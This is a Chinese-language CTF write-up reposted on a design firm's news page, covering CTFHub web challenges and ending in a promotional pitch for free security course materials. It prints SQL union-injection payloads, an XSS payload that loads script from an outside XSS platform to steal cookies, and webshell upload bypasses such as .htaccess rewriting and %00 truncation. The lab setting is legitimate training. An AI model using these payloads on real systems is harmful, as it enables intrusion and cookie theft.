尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

CTFHub技能树详解(最全、最细、最易懂)

CTFHub技能树详解(最全、最细、最易懂) 最近闲的无聊玩玩CTF吧并把自己的解题思路分享给大家。大佬多指教。Web前置技能–HTTP协议请求方式点击连接进入靶场环境意思就是http的请求方式是GET把请求方式换成CTFHUB 就会给你flag。打开burpsuite 开启拦截同时刷新你的浏览器界面bp已成功拦截。更改请求方式如下Forward 放包同时浏览器界面已经把flag显示出来了。302跳转看到302就应该知道是用来做临时跳转的就是你访问一个url时会跳转到另一个url。所以这题的思路就是抓包放包。点击 Give me Flag同时Burpsuite 抓包。把包发送到Repeater模式Send一下。Cookie首先明白cookie的作用是用来验证用户身份的。字面意思只有管理员才能获取到flag。先bp抓个包看一下。看到了Cookieadmin0也就是说不是管理员admin的状态是0把他改成1。放包。浏览器出现flag。基础认证可以看到提供了一个附件。下载下来点进去发现是密码字典。那这道题必是让进行密码爆破了。进入靶场点击click。让登录那就随便输入账户名和密码点击登录同时bp进行抓包。如下图Authentication主要是用来做认证、验证用户身份的。它里面包含了客户端向服务器提供的认证数据。如果我猜得没错后面那个加密的数据就是我刚才输入的用户名和密码。解密一下看看。果然是我输入的用户名admin和密码aaa。既然提供了密码字典那就开始爆破吧。但要注意一点那段加密数据解密之后同时包含了用户名和密码但是提供的密码字典里只有密码所以在密码字典里每个密码前面加个admin:。至于为什么加admin盲猜网站的管理员用户名是admin并且大多数情况下也都是admin。并把用户名和密码的组合进行base64加密。跑了一下发现没有跑出来查了一下资料发现加密后的密文有等号的要把等号删了。这里了解一下base64的加密规则不够4个字节的用等号补充所以把等号删了对结果没有影响那就删。删完时候把密文随便复制到一个.txt文件中后面要用到。把数据包发送到intruder模式添加变量。加载密码字典。把1.txt文件加载进payload直接开始跑结果出来了找status是200的。响应包源代码进来之后发现是空白页面。见到空白页面直接f12审查元素。信息泄露目录遍历进入靶场一个一个目录挨个找PHPINFO进入环境之后点击查看phpinfo仔细找。备份文件下载网站源码这里需要找到网站的备份文件进行下载网上有很多种方式有用脚本的有用扫描器的。这里我直接盲猜/www.zip、/web.zip 先试一试。打开文件发现不对。那就直接访问。成功拿到flag。bak文件提示flag在首页的源码中看到标题bak文件bak文件就是备份文件所以直接把备份文件下载下来。在url后面直接输入/index.php.bakvim缓存好好看看这句话vim一旦异常退出就会生成swp文件且是隐藏文件。隐藏文件要加点首页也说了flag在index.php源码中 所以 /.index.php.swp 直接下载。.DS_StoreDS.Store是Mac里面的隐藏文件里面是所有文件的清单。所以要把这个文件下载下来。下载下来之后打开发现是一些鬼都看不懂的东西。这是Mac中的文件属于linux系统用Windows打开当然看不了。所以把文件复制到Linux系统中如kali。cat一下就行了。之后呢直接浏览器访问.txt文件。Git泄露Log这一关需要用到Git泄露利用工具GitHack。下载地址mirrors / BugScanTeam / GitHack · GitCodepython2环境和git环境 网上一搜就有并且要配置环境变量。复制url。用cmd命令运行你的GitHack输入GitHack.py 你刚才复制的url /.git之后最下面有个文件如下图进入到这个文件中。进来之后直接 git showflag出现。Stash这个和上面的基本相同就有一点点变化。按着上面的步骤先进入到10800 那个文件中然后输入git stash listgit stash popIndex和上面一摸一样。进入那个文件之后 git show FLAG就出现了。SVN泄露你们看这个去吧我不想写了。CTFHUB技能树全详细解析含进阶-CSDN博客HG泄露你们看这个去吧我懒得写了。CTFHUB技能树全详细解析含进阶-CSDN博客密码口令弱口令弱口令就是不安全的密码别人能猜出来。admin / 123456默认口令打开发现是eyou。直接百度搜索eyou默认账号密码SQL注入整数型注入直接上sqlmap吧觉得自己基础不扎实的多练练手工注入。查询当前网站使用的数据库查询数据库里所有的表查询flag表具体内容字符型注入一样的操作。报错注入直接一句话得了没必要一句一句跑了布尔盲注时间盲注Mysql结构这题稍微有点不一样了但是过程和思路都一样。Cookie注入cookie注入那就需要抓包拿到cookie。UA注入这道题主要是对数据包的User-Agent头进行注入用sqlmap的话太慢了跑的时间太长了直接手工注入吧id-1 union select 1,group_concat(table_name) from information_schema.tables where table_schemasqli拿到表名根据表名拿字段名id-1 union select 1,group_concat(column_name) from information_schema.columns where table_name gppfcericc拿具体信息id-1 union select 1, etszlbtzyz from sqli.gppfcericeRefer注入和上一题UA注入基本一样。bp抓到数据包之后发现没有Refer头那就手动添加。Referer:-1 union select 1,database()拿表名-1 union select 1,group_concat(table_name) from information_schema.tables where table_schemasqli拿字段名-1 union select 1,group_concat(column_name) from information_schema.columns where table_name qqzgzuwmaw拿具体信息id-1 union select 1, qwnaswwvdn from sqli.qqzgzuwmaw过滤空格这道题把所有的空格都过滤了那就把所有的空格全部换成/**/拿到表名查字段查具体数据XSS反射型找一个xss平台如xss.yt.com注册登录创建项目默认模块即可配置代码如以下代码。复制粘贴Submit。之后复制url粘贴到第二个框里send。然后打开刚才的xss平台在刚才创建的项目里就会出现数据包信息。cookie里有flag存储型和上面的是一样的存储型就是把恶意代码存储进了数据库每次查库就会触发恶意代码。DOM型;造成闭合后面注释掉DOM跳转http://challenge-cb6cf12cc625476a.sandbox.ctfhub.com:10800/?jumptojavascript:$.getScript(SrC//xss.yt/dwzq)过滤空格这题会把空格给过滤掉所以把你代码段里面的所有空格换成 /**/之后再输入url过滤关键字和上面一摸一样把关键字换成大小写文件上传无验证没有任何验证直接上传的后门文件就行。蚁剑连接找到flag前端验证文件验证的操作是在前端进行的所以我们可以抓包修改文件后缀进行绕过。先把后门文件的后缀改成jpg上传的同时抓包。修改这个地方把后缀再改成php蚁剑连接拿到flag.htaccess.htaccess文件的作用 就是我上传了一个.htaccess文件到服务器那么服务器之后就会将特定格式的文件以php格式解析。AddType application/x-httpd-php .jpg 就是把.jpg文件当作php文件解析。先创建一个.htaccess后缀的文件把这个文件上传然后就可以上传我们的后门文件了记得把后缀改成.jpg上传到服务器之后htaccess文件会把他解析成php的。蚁剑连接mime绕过MIME类型校验就是我们在上传文件到服务端的时候服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测如果是白名单所允许的则可以正常上传否则上传失败。上传一个.jpg的木马文件 同时抓包如果Content-Type不是image/jpeg记得改一下。直接蚁剑连接就行了。00截断%00是截断的意思把后面的内容截断不要了。先上传一个.jpg后缀的后门文件抓包把最上面post请求内容改成这样send一下蚁剑直接连接。POST /?road/var/www/html/upload/123.php%00 HTTP/1.1双写后缀上传一个php的后门文件抓包。在.php的前面加上pph组成一个 b.pphphp。当他过滤掉php的时候刚好php 又组成一个php。蚁剑连接。文件头检查上传一张.jpg图片抓包写入一句话木马更改后缀。并添加GIF89a。 GIF89a用来标识图片的文件头。蚁剑连接。像目前比较火热的开发岗位实属网络安全毕竟国家网络安全法也出台了网络安全等级保护2.0等合规要求也出来了。网络安全对于大部分政企单位来说已经从[可选项]变成了[必选项]。在以前很多政企单位在进行 IT 部门及岗位划分时只有研发和运维部门安全人员直接归属到基础运维部而现在越来越多单位为了满足国家安全法律法规的要求必须成立独立的网络安全部门拉拢各方安全人才、组建 SRC安全响应中心为自己的产品、应用、数据保卫护航。根据国家发布的《网络安全人才实战能力白皮书》数据显示目前中国网络安全人才供应严重匮乏每年高校安全专业培养人才仅有3万余人而网络安全岗位缺口在2027年将达327万缺口高达95%。了解网络安全首先要搞清楚下面这些前提网络安全到底包含哪些技术是否需要会编程网络安全行业有哪些职业方向“我”该如何选择网络安全的职业发展和成长路线是什么如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
返回列表